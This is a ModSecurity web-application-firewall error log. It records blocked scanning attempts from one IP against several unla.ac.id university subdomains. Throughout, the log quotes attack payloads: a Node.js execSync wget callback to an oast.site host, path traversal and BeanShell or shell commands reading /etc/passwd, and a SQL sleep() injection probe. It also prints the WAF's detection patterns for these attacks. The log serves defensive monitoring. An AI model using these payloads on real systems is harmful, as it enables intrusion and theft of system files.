[Tue Aug 29 11:31:26.687417 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlg9mh6fg1oe3ag6.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAQFcSUAAAAn"]
[Tue Aug 29 11:31:26.707574 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlg43eqxy5w787j8.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAQTKHUAAAA1"]
[Tue Aug 29 11:31:26.753381 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlgx3t3pa1ryt1ht.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAPahyoAAAAL"]
[Tue Aug 29 11:31:26.769544 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlg79qa9scyygapy.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAQTKHYAAAA1"]
[Tue Aug 29 11:31:26.787124 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlgfts4cz7aug1gd.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAQQylEAAAAy"]
[Tue Aug 29 11:31:27.347989 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAPahysAAAAL"]
[Tue Aug 29 11:31:27.349163 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAQFcScAAAAn"]
[Tue Aug 29 11:31:27.350864 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAP@My4AAAAZ"]
[Tue Aug 29 11:31:27.409238 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10n8Co-f0AAAN@5FMAAAAO"]
[Tue Aug 29 11:31:27.409564 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAPDn6cAAAAP"]
[Tue Aug 29 11:31:27.443283 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAQJWs8AAAAr"]
[Tue Aug 29 11:31:27.575821 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlg3eant8q9ownea.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/page"] [unique_id "ZO10n8Co-f0AAAQTKHcAAAA1"]
[Tue Aug 29 11:31:27.624868 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10n8Co-f0AAAQQylIAAAAy"]
[Tue Aug 29 11:31:27.628595 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10n8Co-f0AAAQA-9cAAAAi"]
[Tue Aug 29 11:31:27.634224 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10n8Co-f0AAAO88B0AAAAF"]
[Tue Aug 29 11:31:28.407316 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10oMCo-f0AAAQSWL4AAAA0"]
[Tue Aug 29 11:31:28.586055 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10oMCo-f0AAAO88B8AAAAF"]
[Tue Aug 29 11:31:28.642225 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10oMCo-f0AAAP6NNoAAAAQ"]
[Tue Aug 29 11:31:29.134480 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAQSWMAAAAA0"]
[Tue Aug 29 11:31:29.137102 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAQEGIgAAAAm"]
[Tue Aug 29 11:31:29.155240 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAQQylYAAAAy"]
[Tue Aug 29 11:31:29.212417 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAP5mIwAAAAM"]
[Tue Aug 29 11:31:29.313033 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAP5mI0AAAAM"]
[Tue Aug 29 11:31:29.320340 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAQMrq4AAAAu"]
[Tue Aug 29 11:31:29.425438 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAQMrrAAAAAu"]
[Tue Aug 29 11:31:29.428634 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAQQylgAAAAy"]
[Tue Aug 29 11:31:29.431762 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAP@MzUAAAAZ"]
[Tue Aug 29 11:31:29.436718 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAQEGIoAAAAm"]
[Tue Aug 29 11:31:29.437682 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAPahy8AAAAL"]
[Tue Aug 29 11:31:29.492742 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAQR45wAAAAz"]
[Tue Aug 29 11:31:29.496645 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAQNwGcAAAAv"]
